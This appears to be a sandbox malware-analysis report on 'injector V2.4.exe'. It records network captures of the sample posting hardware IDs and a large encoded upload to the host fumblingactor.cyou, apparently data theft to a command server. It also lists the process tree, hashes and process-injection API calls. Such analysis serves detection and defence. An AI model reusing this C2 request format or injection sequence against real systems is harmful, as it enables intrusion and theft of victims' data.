2024-11-21 15:52:07 UTC	994	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 15:52:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o7f6g0546k9jjighaqm2een1tl; expires=Mon, 17-Mar-2025 09:38:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hsUqm7nV3NO9rdRTtO1UNaQcJOPBSI9lnz5PWTPJkLTf9yTOPm6xHsVKvMH8QCHEWUEak%2B5akhFcpkt4pCkpP4smbIc6Z%2BjwAfUpsNuWRLtzIZkH1kGU5BEfdG6Jsu66OyM3%2BXw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e61d852ed4b8ce8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1998&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2845&recv_bytes=15998&delivery_rate=1357508&cwnd=252&unsent_bytes=0&cid=bbd0c17c9f2a133c&ts=820&x=0"
2024-11-21 15:52:07 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-21 15:52:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49714	172.67.219.199	443	1492	C:\Users\user\Desktop\injector V2.4.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 15:52:09 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=C1QY4W1ZKU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20526 Host: fumblingactor.cyou
2024-11-21 15:52:09 UTC	15331	OUT	Data Raw: 2d 2d 43 31 51 59 34 57 31 5a 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 43 31 51 59 34 57 31 5a 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 43 31 51 59 34 57 31 5a 4b 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 6c 73 6f 63 0d 0a 2d 2d 43 31 51 59 34 57 31 5a 4b 55 0d 0a 43 Data Ascii: --C1QY4W1ZKUContent-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--C1QY4W1ZKUContent-Disposition: form-data; name="pid"3--C1QY4W1ZKUContent-Disposition: form-data; name="lid"LPnhqo--uoaywzyrlsoc--C1QY4W1ZKUC
2024-11-21 15:52:09 UTC	5195	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: un 4F([:7s~X`nO`i
2024-11-21 15:52:10 UTC	1002	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 15:52:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0deiahqo4ailb8gasr0qff3djp; expires=Mon, 17-Mar-2025 09:38:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bt%2BnQu4wCnJ4vTpZDij7YKbM4JPnKsEKLPSPYtNuwfWug6cQnfssmQVfe%2F6O%2Fk0K5YzFlKYov%2B71G6sYaom9bWms0ferEFH4t%2F0%2BHsICT1OAxZzWy%2BcvBueaYchKlonDGjfcCBk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e61d8649da07288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2005&sent=14&recv=26&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21482&delivery_rate=1423001&cwnd=243&unsent_bytes=0&cid=9943464aa0836ced&ts=935&x=0"
2024-11-21 15:52:10 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-21 15:52:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49715	172.67.219.199	443	1492	C:\Users\user\Desktop\injector V2.4.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 15:52:12 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=U0YBS5GLCGU18GRPD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1266 Host: fumblingactor.cyou
2024-11-21 15:52:12 UTC	1266	OUT	Data Raw: 2d 2d 55 30 59 42 53 35 47 4c 43 47 55 31 38 47 52 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 55 30 59 42 53 35 47 4c 43 47 55 31 38 47 52 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 30 59 42 53 35 47 4c 43 47 55 31 38 47 52 50 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 Data Ascii: --U0YBS5GLCGU18GRPDContent-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--U0YBS5GLCGU18GRPDContent-Disposition: form-data; name="pid"1--U0YBS5GLCGU18GRPDContent-Disposition: form-data; name="lid"LPnhqo--uoaywzyr
2024-11-21 15:52:13 UTC	987	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 15:52:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vdaht2i35o4k4et4onn0ic83gh; expires=Mon, 17-Mar-2025 09:38:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ohfjOgaPskapzYzW4Rs5pMU4a8130A1vPdgZpy5nw9XvRS45xYYW75uIuDzd4qWP4INVan8XLZ4c6Ktm1s9D6jshAUBGMk5XPgGMoSD7nLskK63q%2FjeR2TrstG0Y60S6w2uHWo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e61d877eb854238-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1636&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2184&delivery_rate=1751649&cwnd=244&unsent_bytes=0&cid=e6f0d3549477cdf9&ts=737&x=0"
2024-11-21 15:52:13 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-21 15:52:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49716	172.67.219.199	443	1492	C:\Users\user\Desktop\injector V2.4.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-21 15:52:14 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=OWS7AAIK91 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 569214 Host: fumblingactor.cyou
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: 2d 2d 4f 57 53 37 41 41 49 4b 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 45 42 41 33 35 37 37 33 30 37 33 34 41 42 37 45 38 33 38 43 33 38 39 44 42 33 35 37 46 35 39 0d 0a 2d 2d 4f 57 53 37 41 41 49 4b 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 57 53 37 41 41 49 4b 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 75 6f 61 79 77 7a 79 72 6c 73 6f 63 0d 0a 2d 2d 4f 57 53 37 41 41 49 4b 39 31 0d 0a 43 Data Ascii: --OWS7AAIK91Content-Disposition: form-data; name="hwid"EEBA357730734AB7E838C389DB357F59--OWS7AAIK91Content-Disposition: form-data; name="pid"1--OWS7AAIK91Content-Disposition: form-data; name="lid"LPnhqo--uoaywzyrlsoc--OWS7AAIK91C
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: bd 05 4b f5 0a 8c 91 72 96 d2 e0 48 58 4a 39 80 00 62 27 88 b1 87 52 24 80 d2 04 94 d5 08 67 9e 70 65 b8 0a 83 76 55 2c cc c7 c1 b2 6d d1 e1 99 62 eb fb 38 1e 3b c0 63 df 79 5b 34 08 af e8 e8 ee c6 f6 99 f2 5b fd ff 0f a2 53 0f 00 5a 71 07 98 e3 03 09 a6 94 7c 16 60 f6 f1 c1 fc 54 a5 4b 99 11 91 65 96 8b bd 99 e5 fc 10 f7 1f a2 f1 63 73 06 97 68 64 df 69 03 31 0e c9 20 de c2 21 35 d3 c9 83 0f 34 2b ae 06 9a a2 e3 76 3c 73 2a 83 14 d4 60 ca 0e 5e 89 26 d5 7f eb 43 7a 44 e2 27 04 b7 76 cb d0 9c 39 50 ec 48 4d f2 f3 e5 49 35 ee 94 56 12 a5 da 42 9e 3c 04 cb f5 96 00 1b 37 ee 74 49 29 a6 e8 1c 66 de 24 63 bb 39 c0 55 91 d5 e0 2c ca 21 ac 29 d6 f6 9a 9b 8e af 3b 2a 51 48 8c 2c 24 d1 59 d5 9c c9 5d 01 fe 7b a8 da e8 20 01 30 fd 1d bd b8 15 60 12 a8 96 cc be 61 Data Ascii: KrHXJ9b'R$gpevU,mb8;cy[4[SZq\|`TKecshdi1 !54+v<s`^&CzD'v9PHMI5VB<7tI)f$c9U,!);QH,$Y]{ 0`a
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: 26 a4 dc 65 92 45 6d 26 b6 63 7a 5c 1a c3 03 4e 65 44 3c 10 d5 1b ae 75 8d e4 29 61 60 b5 4d ea b4 a5 9a 88 a3 2a ff db a4 1a ab 2f 96 cf 42 68 db d0 bc d8 d4 9a 9b 2f 34 fd fb 48 a0 3a 12 54 19 35 ba 7e c4 65 d0 d5 d8 4c 24 37 95 11 7e 69 9e bc e4 62 01 07 9d 26 e3 7d 12 17 ad 55 aa 13 77 32 42 89 a6 cf 2c e2 8e a0 09 28 76 5a f1 ca 57 85 f5 3a 49 77 15 86 e1 a4 52 63 f0 34 aa b1 bc 02 f1 bc c9 f9 26 5e 02 7b d4 8a 13 6b f4 77 10 58 b4 cf 66 04 2f be fc 72 ac f4 b7 7b 61 9d e5 d9 2b 3c 5a e6 9f 39 d9 0c 0d 3e 8c 24 e7 4c 02 6f 4f 5a 7b bb 22 42 e7 fc 16 fa fb c3 66 e6 ce c6 66 cd bf d7 42 c2 bb 69 b9 ee e5 64 14 a1 ed 69 ed f7 cd 56 59 e4 7f ea bc 45 b0 08 fd b6 d1 fc a7 28 aa fe 8f 8b 1d 1d 2a 8d a1 7b 59 63 19 97 d6 89 e3 4d a8 89 cb c0 3a 9e 82 9f c3 Data Ascii: &eEm&cz\NeD<u)a`M/Bh/4H:T5~eL$7~ib&}Uw2B,(vZW:IwRc4&^{kwXf/r{a+<Z9>$LoOZ{"BffBidiVYE({YcM:
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: 12 3b 33 38 5e 3a a8 2f 1f 13 ee 68 73 a8 42 ef 1a a6 1c 68 d7 b4 1f 8e 94 58 77 9a f2 62 68 c1 0a d5 9b 8c 51 14 cf 4d f4 08 59 12 2c 3b a9 a3 1a 74 bd 80 d0 05 11 b7 e8 ba a5 a7 2a a9 df dd 86 58 36 53 f9 8b 29 7f eb 33 a4 da 74 df c8 83 c1 4b 23 85 e4 f3 cb 82 c5 86 8c e1 6f 65 07 09 b5 ed 77 be 0f 23 1d f2 57 40 7d d8 55 8f 5f 43 0a 9f 86 33 ab 81 76 b8 7a f6 2e 34 ad d5 ba 64 9e b3 e9 f4 51 92 06 70 6c 57 49 89 c7 a4 c7 a3 72 47 f1 8d df ea 6a de 3b 72 9c 1e 75 1e 6b 2a 7d 20 54 18 32 e2 9b 29 71 25 96 6a 4b 87 df ba 34 5e ae 40 f6 39 6a 3a aa 93 ea de f1 8d 42 bb 2a ec 91 fc 65 de ab a3 65 93 f1 83 e4 66 1b 35 ca a9 76 7a 83 49 3f 24 e2 43 d1 62 1b 0f 6d 2c 08 30 46 df 33 78 d6 7c 03 9d b7 4a 43 2b ce 2d a5 8a bf 6b c2 2d d6 50 6b 83 9e a4 d7 b4 d7 Data Ascii: ;38^:/hsBhXwbhQMY,;tX6S)3tK#oew#W@}U_C3vz.4dQplWIrGj;ruk} T2)q%jK4^@9j:B*eef5vzI?$Cbm,0F3x\|JC+-k-Pk
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: c9 a0 26 c3 7e c5 cb 93 f9 b6 ef 0c 93 8c c7 db 71 a2 53 f1 aa 51 3b fa c4 07 b5 d7 db 65 88 f6 5c 93 a3 14 f6 71 5b 4f 6a 5f 4b e0 24 cd e7 cb 31 bc ef ca ae 2e 15 10 74 44 39 ad e3 49 83 59 39 ca 47 19 0d 61 15 c8 83 b0 c2 15 00 2d 61 0f b1 44 c1 0f de b6 1f c2 2d c4 60 37 ec ba 34 07 59 63 21 82 1e 89 0c 82 ae bb ab 34 f2 41 16 c0 5e 85 72 e8 f7 db 52 96 e3 94 87 67 15 1f cc a2 94 5d 86 d9 79 d0 ca 5e 21 e6 2e 4f 60 8a bd 36 82 65 ce f5 df dd bd d7 b3 33 57 bc f2 ea 6e 4c ba 5b 1d 73 3c 47 74 ca 39 21 5e 2c d8 01 2f 23 db f7 2d 09 3e be 19 bb a3 59 72 d1 49 8f 20 81 b9 10 eb d8 b7 ca 08 f4 d7 e9 9a b7 a9 b0 72 c8 ee 04 cd 8a a3 df 7f 08 27 e8 40 ba a6 2e ff 02 ed 0d d4 c6 9d 9e f1 6f 4d b6 82 28 70 4e c2 f2 9e 04 a8 22 d5 35 be 3f df 29 b4 73 f5 94 ae Data Ascii: &~qSQ;e\q[Oj_K$1.tD9IY9Ga-aD-`74Yc!4A^rRg]y^!.O`6e3WnL[s<Gt9!^,/#->YrI r'@.oM(pN"5?)s
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: e0 f2 43 00 f4 6f 84 bb 87 5d 47 f9 f7 4e 30 9b 27 2a cb 9e 26 a0 d0 af 37 9e 22 3e 83 03 3c 23 40 93 c1 2c 83 d9 43 73 8f 1d 22 c3 6c 20 da f3 f2 04 96 e8 4f b8 09 16 23 1e ed 3d 0a 58 ee 36 a1 23 82 20 50 6f fd be 8c a7 7c b1 0e 01 12 80 77 c1 16 08 eb c5 10 73 47 8a a5 85 5b e9 39 0f c2 9f ae fb 85 0d 0a fa 1e 5e b6 9d af ec d9 e5 26 f1 37 eb 89 d7 d9 b1 56 74 ab 19 fe fe 7b cb 3e e0 1d c5 3f 91 a3 56 e8 24 02 dc 94 ec 06 c1 06 39 2a 40 4e 9c 7d 56 91 f1 45 fc 0b e4 1d a5 51 50 26 05 4d 77 2e c9 c6 32 7a 4a 70 b2 b9 67 10 c3 63 a2 d4 be fd dd 3b c1 e4 88 12 8e 71 5a 42 e2 4f 69 f2 3b 51 ea 09 22 71 f9 a7 54 b7 08 10 96 8e be f5 15 92 bb 5e e0 46 40 1b fc 9d 51 47 51 3b b1 a8 91 08 38 18 be 14 38 7d 24 83 ef 49 98 3d 46 f2 64 64 e1 22 37 8f d2 5a 99 0a Data Ascii: Co]GN0'&7"><#@,Cs"l O#=X6# Po\|wsG[9^&7Vt{>?V$9@N}VEQP&Mw.2zJpgc;qZBOi;Q"qT^F@QGQ;88}$I=Fdd"7Z
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: 6b 54 11 01 e1 fd cc b5 97 84 e8 9e b3 89 52 ae 73 6f 9d f6 b5 87 17 ef b4 a6 af de 6c 3b 84 b9 ec 88 74 71 97 13 31 2f 56 5e 97 e0 e3 18 b5 b7 f0 b6 a9 66 9d cf cf 36 be 58 59 ba 56 5c 75 df 45 27 b2 ea ea be aa d5 6e c7 ef bb 49 2c 9a d3 38 2c 78 1f aa 79 12 f0 5a e7 f9 5b 1f 56 0f 95 e9 28 55 6a f7 a5 85 f2 e3 ee 16 59 8a ea 7f 48 9f 07 fd fb dd 2d 99 61 3f 5f 59 47 ae 3a 3d ef 1c ce 91 88 5c 7d 71 db 4b 10 26 b4 ee cc 9c 3c fd c5 c1 b4 ff 7b e9 68 aa bd e4 27 b3 ef 07 33 b2 87 e3 98 b3 57 22 4d 19 31 b2 1b 5f 85 5a 8e 2f 44 37 14 ad 35 bc 5d 6f 58 bf 37 71 c2 e9 9d 70 c8 53 1b 98 6f b9 3b 06 15 a5 aa 21 59 cd c4 6d 5c 8d 2b c4 4b 3c 03 29 a1 8e d0 c2 9e 82 6b 1b a7 fc 46 9f 54 e5 f8 06 fb 39 28 c4 5a 1d a9 de b2 0b 0f d2 78 8d 18 fb d2 f8 35 87 7e 15 Data Ascii: kTRsol;tq1/V^f6XYV\uE'nI,8,xyZ[V(UjYH-a?_YG:=\}qK&<{h'3W"M1_Z/D75]oX7qpSo;!Ym\+K<)kFT9(Zx5~
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: 2c b7 d0 5c 13 46 57 78 a9 e1 e8 1a 53 75 d0 d1 b3 51 5d f0 d9 67 79 c2 11 8e 18 fa 7c b6 48 e3 1d 38 56 d6 64 6d b4 ba 43 55 9e 8c ed e0 87 9c 38 d0 d4 58 ba 8b 33 b0 6a b3 9c 2e 0c 24 86 60 bf 1d 94 f6 e2 fc c2 a6 27 e0 92 b7 61 6b 03 4c cd a3 b8 22 ba 4d 01 4d 96 95 20 88 2d 4f eb 0b e6 3b 37 95 1b 8b af 45 cc cf f1 98 33 22 92 b7 70 c0 4c cc 2c b3 bb 86 2a fe a8 ee dc 9c 87 67 03 d6 14 37 ae 08 e5 69 a0 c7 63 52 f8 66 2b 8e 28 ca 5f 70 89 d8 38 a7 4c 14 f8 31 70 1a db 56 6f ed 05 3b 72 f7 46 92 b5 4d be fc b8 a2 a0 b1 f8 dc 13 4a be 45 98 04 18 b4 d2 fa e0 18 a8 c6 d7 1e 86 b1 1a 76 50 20 07 33 07 fa cb 62 8d 53 b8 e7 98 19 57 d9 77 4d 09 29 98 a0 18 3a 13 10 de 93 bd f0 e9 a6 6a 1d a1 f0 f2 08 2e c4 67 f5 2b ef d6 6d 3b ed 33 ea c3 3c f0 dd 51 3f 26 Data Ascii: ,\FWxSuQ]gy\|H8VdmCU8X3j.$`'akL"MM -O;7E3"pL,*g7icRf+(_p8L1pVo;rFMJEvP 3bSWwM):j.g+m;3<Q?&
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: e7 03 1f 53 3a c2 b1 a6 4b b9 90 6b 0c b5 4a 94 ba 4b b0 a8 8e 87 71 cb 27 9b f0 31 7c f9 38 aa fb fa f4 5d d3 e1 c4 20 24 4f a3 39 eb e6 35 99 96 a8 c2 84 20 c4 49 c6 98 27 b3 e8 6c 42 5b 00 69 e3 57 5e 5a 97 e6 2e 42 e3 6f cb d2 4f 43 51 8b 6a af 39 62 9c 7d 4b 71 72 e9 f3 34 44 7c d6 88 65 9e 97 47 de a8 79 0d 0a 87 5b f0 ec 55 6a cc eb e0 76 4b 12 09 84 10 0e 04 3b 2f 49 cc 44 65 be 65 f6 40 45 2f 1a d4 11 a7 fa 33 4e 0b 2c ec 13 57 17 8f f9 89 c4 0d ca ca 0f 45 ad f6 1f f0 7c 87 35 55 20 2a b9 46 c6 47 be e3 1b ae 00 e9 4b b6 69 92 42 2d 45 2f db b7 78 00 3b 98 6f d0 29 36 19 de da 24 4a 25 cf ac 9d 01 6d 87 b0 b5 5c 92 f1 ab b1 11 8f c5 b5 e8 c5 54 90 7e 12 4f 33 46 2f d9 08 9a 1e e6 3b be 17 bd d4 9a a4 a9 ac d4 87 06 3c fa 20 65 5b 40 93 9c 0e ac Data Ascii: S:KkJKq'1\|8] $O95 I'lB[iW^Z.BoOCQj9b}Kqr4D\|eGy[UjvK;/IDee@E/3N,WE\|5U *FGKiB-E/x;o)6$J%m\T~O3F/;< e[@
2024-11-21 15:52:14 UTC	15331	OUT	Data Raw: a7 bf 66 2c 7c ef 30 81 61 00 e8 7e aa 0c 27 24 59 08 f2 32 fc bc dd 25 26 fc 44 8d 37 e3 1a 06 96 fe 1b 5c 7d 12 83 c6 d6 dd ef 62 38 ea 05 0b 01 97 7d b1 5a a8 b7 84 d2 ae 78 49 a2 11 62 cb e6 cc eb dc cb 39 ad 90 26 92 fa 4a 31 5a c3 87 b0 ac c1 df 6c 40 5a d0 5c 1d a1 48 60 68 80 d8 de 59 52 35 64 28 86 ef de fe ef be f5 e5 a6 95 d9 6d 3c 35 30 6a 42 7f 68 b0 82 63 6f a7 d3 4f 02 e2 fe d8 85 2b c3 f8 8d 25 be b5 0a 06 fc 94 14 4b f0 06 08 d4 bf 7b ce 80 ce 5d f8 fd e1 3f e5 64 1f d7 ad 6a 92 11 64 23 64 f9 28 f2 77 3f 49 3a d6 89 58 00 88 bb 85 47 dc 45 97 f0 3c 25 c3 65 2e 6e c3 df 4a d3 49 21 e6 04 24 db 70 31 34 f4 89 f0 7f 64 14 6b 6f cc 65 09 ab d4 61 3b 13 f5 d8 08 23 ac 03 3f 61 fb 99 ff 46 9c 62 bc 2d ed 30 09 98 55 b0 1b 44 70 c3 8a 20 4d 0f Data Ascii: f,\|0a~'$Y2%&D7\}b8}ZxIb9&J1Zl@Z\H`hYR5d(m<50jBhcoO+%K{]?djd#d(w?I:XGE<%e.nJI!$p14dkoea;#?aFb-0UDp M
2024-11-21 15:52:17 UTC	994	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 15:52:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r5dtpncmqdkluuifbqqbcjaaet; expires=Mon, 17-Mar-2025 09:38:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m2oMsci6R1Qajvu9tzCHWsrSeC7FGqaJF5yEDFA9HhS44pgSefjHD9tM4fQDlKgOSiaJSBFCnwGjSYhAEl39CY9EwaDCBYX13Whqev3q96ej1BubgWS0GIMLOx%2BV3Id9Rm9dLlQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e61d8867beb1801-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1767&sent=302&recv=590&lost=0&retrans=0&sent_bytes=2845&recv_bytes=571755&delivery_rate=1583514&cwnd=218&unsent_bytes=0&cid=3be4688550219720&ts=2226&x=0"

Target ID:	0
Start time:	10:51:55
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\injector V2.4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\injector V2.4.exe"
Imagebase:	0xb20000
File size:	587'904 bytes
MD5 hash:	837840F37E344F8E7BC187F88F93C4A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:51:55
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:51:57
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\injector V2.4.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\injector V2.4.exe"
Imagebase:	0xb20000
File size:	587'904 bytes
MD5 hash:	837840F37E344F8E7BC187F88F93C4A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:51:57
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\injector V2.4.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\injector V2.4.exe"
Imagebase:	0xb20000
File size:	587'904 bytes
MD5 hash:	837840F37E344F8E7BC187F88F93C4A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	0.8%
Signature Coverage:	4.3%
Total number of Nodes:	1165
Total number of Limit Nodes:	20

Executed Functions

Function 00B5D18D Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00B5D0FF,00B5D0EF), ref: 00B5D323
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00B5D336
Wow64GetThreadContext.KERNEL32(000000F8,00000000), ref: 00B5D354
ReadProcessMemory.KERNELBASE(00000104,?,00B5D143,00000004,00000000), ref: 00B5D378
VirtualAllocEx.KERNELBASE(00000104,?,?,00003000,00000040), ref: 00B5D3A3
TerminateProcess.KERNELBASE(00000104,00000000), ref: 00B5D3C2
